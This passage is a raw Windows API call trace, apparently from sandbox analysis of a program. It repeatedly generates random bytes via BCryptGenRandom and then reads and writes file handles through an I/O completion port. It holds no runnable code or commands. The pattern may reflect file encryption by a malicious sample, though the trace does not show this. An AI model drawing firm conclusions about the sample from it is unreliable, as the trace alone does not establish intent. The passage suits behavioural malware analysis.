lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0100.577] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0100.577] CloseHandle (hObject=0x334) returned 1 [0100.580] free (_Block=0x3db00b8) [0100.586] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0100.629] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.632] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.633] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0100.633] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.636] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0100.637] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0100.637] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0100.637] free (_Block=0x77d800) [0100.637] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0100.637] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0100.638] free (_Block=0x2071818) [0100.638] free (_Block=0x2071928) [0100.638] free (_Block=0x77d908) [0100.638] WriteFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.638] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0100.678] WriteFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2340, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.678] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0100.679] CloseHandle (hObject=0x13e4) returned 1 [0100.680] free (_Block=0x1ff1e60) [0100.680] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0100.685] CloseHandle (hObject=0x13e4) returned 1 [0100.685] free (_Block=0x1ff1e60) [0100.685] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0100.702] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.714] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0100.714] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.717] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0100.718] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0100.718] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0100.718] free (_Block=0x77d800) [0100.718] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0100.718] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0100.718] free (_Block=0x2071818) [0100.718] free (_Block=0x2071928) [0100.719] free (_Block=0x77d908) [0100.719] WriteFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.719] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0100.721] WriteFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1c30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.721] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0100.752] ReadFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3a19, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.765] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0100.766] CloseHandle (hObject=0x13e4) returned 1 [0100.767] free (_Block=0x1ff1e60) [0100.767] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0100.782] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.785] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0100.785] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.788] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0100.788] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0100.788] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0100.788] free (_Block=0x77d800) [0100.788] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0100.788] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0100.789] free (_Block=0x2071818) [0100.789] free (_Block=0x2071928) [0100.789] free (_Block=0x77d908) [0100.789] WriteFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.789] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0100.791] WriteFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1a20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.791] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0100.815] ReadFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xcb3, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.816] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0100.816] CloseHandle (hObject=0x13e4) returned 1 [0100.821] free (_Block=0x1ff1e60) [0100.821] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0100.855] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.859] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0100.860] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.867] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0100.872] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0100.872] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0100.872] free (_Block=0x77d800) [0100.872] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0100.872] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0100.872] free (_Block=0x2071818) [0100.872] free (_Block=0x2071928) [0100.872] free (_Block=0x77d908) [0100.872] WriteFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.873] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0100.890] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.894] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0100.894] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.897] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0100.897] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0100.897] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0100.897] free (_Block=0x77d800) [0100.897] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0100.897] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0100.897] free (_Block=0x2071818) [0100.897] free (_Block=0x2071928) [0100.897] free (_Block=0x77d908) [0100.897] WriteFile (in: hFile=0x1194, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0100.898] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.155] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.159] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0101.159] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.161] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0101.165] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.165] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.165] free (_Block=0x77d800) [0101.165] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.165] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.165] free (_Block=0x2071818) [0101.165] free (_Block=0x2071928) [0101.165] free (_Block=0x77d908) [0101.166] WriteFile (in: hFile=0x334, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0101.167] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.187] WriteFile (in: hFile=0x334, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x2e80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0101.188] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.197] ReadFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xd9c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0101.197] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.221] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.224] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0101.224] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.227] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0101.227] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.227] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.227] free (_Block=0x77d800) [0101.227] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.227] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.228] free (_Block=0x2071818) [0101.228] free (_Block=0x2071928) [0101.228] free (_Block=0x77d908) [0101.228] WriteFile (in: hFile=0xa50, lpBuffer=0x3e3003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30008 | out: lpBuffer=0x3e3003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30008) returned 1 [0101.228] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.282] ReadFile (in: hFile=0xa50, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1485, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0101.304] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.318] ReadFile (in: hFile=0x13e4, lpBuffer=0x3e3003c, nNumberOfBytesToRead=0xa24, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30008 | out: lpBuffer=0x3e3003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30008) returned 0x0 [0101.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.337] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.339] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0101.339] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.341] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0101.341] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.341] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.342] free (_Block=0x77d800) [0101.342] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.342] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.342] free (_Block=0x2071818) [0101.342] free (_Block=0x2071928) [0101.342] free (_Block=0x77d908) [0101.342] WriteFile (in: hFile=0x334, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0101.342] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.361] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.364] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.364] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0101.364] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.366] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0101.366] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.366] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.366] free (_Block=0x77d800) [0101.366] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.367] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.367] free (_Block=0x2071818) [0101.367] free (_Block=0x2071928) [0101.367] free (_Block=0x77d908) [0101.367] WriteFile (in: hFile=0xa54, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0101.367] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.376] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.378] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0101.378] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.380] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0101.380] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.380] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.380] free (_Block=0x77d800) [0101.380] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.380] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.381] free (_Block=0x2071818) [0101.381] free (_Block=0x2071928) [0101.381] free (_Block=0x77d908) [0101.381] WriteFile (in: hFile=0xa50, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0101.381] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.382] CloseHandle (hObject=0x334) returned 1 [0101.384] free (_Block=0x3d70048) [0101.385] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.385] CloseHandle (hObject=0xa54) returned 1 [0101.386] free (_Block=0x3ef0008) [0101.387] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.391] WriteFile (in: hFile=0xa50, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x14d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0101.391] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.517] ReadFile (in: hFile=0x13e4, lpBuffer=0x3e3003c, nNumberOfBytesToRead=0x135b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30008 | out: lpBuffer=0x3e3003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30008) returned 0x0 [0101.531] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.541] ReadFile (in: hFile=0xcb0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x47a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0101.542] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0101.557] ReadFile (in: hFile=0xcb4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x1d9f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0101.594] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, 